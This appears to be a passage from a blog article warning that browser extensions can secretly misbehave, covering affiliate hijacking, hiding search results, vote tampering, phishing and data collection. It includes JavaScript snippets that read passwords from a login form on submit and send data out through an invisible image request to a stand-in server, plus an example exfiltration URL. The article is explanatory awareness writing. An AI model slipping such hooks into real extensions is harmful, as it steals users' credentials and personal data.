Like what?

The extension can do what it promises, it can do it well, it can have fantastic support and reviews. This doesn’t mean it’s not doing something else behind the curtains.

Affiliate link hijaking

The author could look for links that have an affiliate tag and change them with their own affiliate id. This leaves no traces in the networks tab since we are not talking to the outside world but rather modifying the url of a link to point to a different tag. This doesn’t hurt you but it does hurt the person relying on the affiliate revenue. Well, I said too fast it doesn’t hurt you… can you trust the links anymore? Can you trust the content?

Content modification, denial of action

With a few regular expressions and rules the author can write a script that hides parts of the page you are visiting if they contain a certain word, this used to be a classic the early days of malware. You had your virus, tried searching for an answer and your browser would close itself, or even force a reboot if you tried doing certain tasks.

I’d consider this the browser version of that. Granted we are not allowed to close a tab with close() as easily as it could, but with a little tweaking of the general behaviour of a page, say we take over the access to all links and open the tab programmatically… Now we can close them if we don’t like what they’ve loaded, ain’t that just fantastic for the author.

Note that all the examples I provide are without dependencies, plain old JS, one could just as easily add a framework into their extension and do this in a fraction of the code.

About the hiding parts of the content, which I find more interesting, it’s also very simple. The following snippet would hide all results in a google search that contain the word panda, potentially guiding a help seeking user towards other brands. You know what I’m saying.

document.querySelectorAll(“.ads-ad,.g”)

.forEach(

e=>RegExp(/panda/gi).test(e.textContent)

&&(e.style.display = ‘none’)

)

Likes, claps, shares impersonation

The author could make people like videos/posts/comments or dislike them for that matter even without making it obvious, imagine I’m talking about Reddit. The author could hook into your upvotes and before the vote goes through, change the post id on the parent element so that you are actually upvoting something else. This can lead to a post reaching frontpage or gaining more visibility illegitimately. Hell, the author could even make you clap for this story without you realizing you did.

I never clicked the like link, an extension I wrote did for me

However, this one has a simple solution and it’s reject an interaction if the event doesn’t have the isTrusted flag. Read the docs. Kinda like medium does it. Try to trigger a click event from a script on the code and it will do nothing. As far as I know, this can’t be faked, there should be no event where you need to emulate the action from the user from code.

If you find yourself triggering clicks programmatically to get some functionality to be executed you are doing things wrong.

Password stealing

The author can hook into form submissions and extract the password from under your nose, your password and your login, and of course the website you are trying to access. For the snippet, I’m assuming a form with a specific id, but there’s literally no limit to what the extension can do.

//Really, it's that simple

var d = document;

d.querySelector("#signin_form")

.addEventListener("submit", function(e){

console.log(d.querySelector("input[type='password']").value)

});

But not only that, not only your passwords to your twitter account or whatever, all the data you pass, all the data you read. When you add a credit card to Amazon? Hey, it’s me! the friendly extension, always present, always looking!

Ad replacement, phishing, etc

The author could replace advertisement from a site with their own, gaining ad revenue, replace links on legitimate websites (your bank for instance) with phishing sites, so when you go to log in you are no longer on the safe one.

Notice the replaced URL at the bottom left of the browser

Then as the phishing sites usually do, they fake a failed login attempt and redirect you back to the real site. The author then flags your device as “stolen” and it will no longer redirect you there, following visits will work seamlessly, but your credentials are compromised.

I know I’m oversimplifying this since you should have 2FA enabled on everything by now, but do you? Do all your logins require an SMS, OTP or similar?

Illegal data collection

Sending data to a random server might be too obvious and easily spotted, but the author could insert an invisible image in the DOM and pass the data through URL parameters onthe source of the image.

var el = document.createElement('img');

el.src = "https://myserver.com?yourdataencoded

While this appears on the network tab it doesn’t show in the XHR tab which is the one you would expect for data that is going out/in but rather on the images tab, even if the author is passing your data in that call. Of course this means a global XHR breakpoint isn’t triggered by this either.

An even more advanced technique would be to hide the data extracted within the URL but at the same time return something of apparent value for the user, an icon, a font. It can be pushing you data out on a GET request.

Get an image from http://harm.less/dXNlcm5hbWU6cGFzc3dvcmQ/image.png which is by all purposes an image, regardless of the middle string being your username and password. Split the data in multiple calls, throughout multiple days even, from multiple pages. The extension can make its image fetch from a second tab from shared data that it gathers, take advantage of a new page loading, inject that call in there, good luck finding it in your twentieth reddit tab.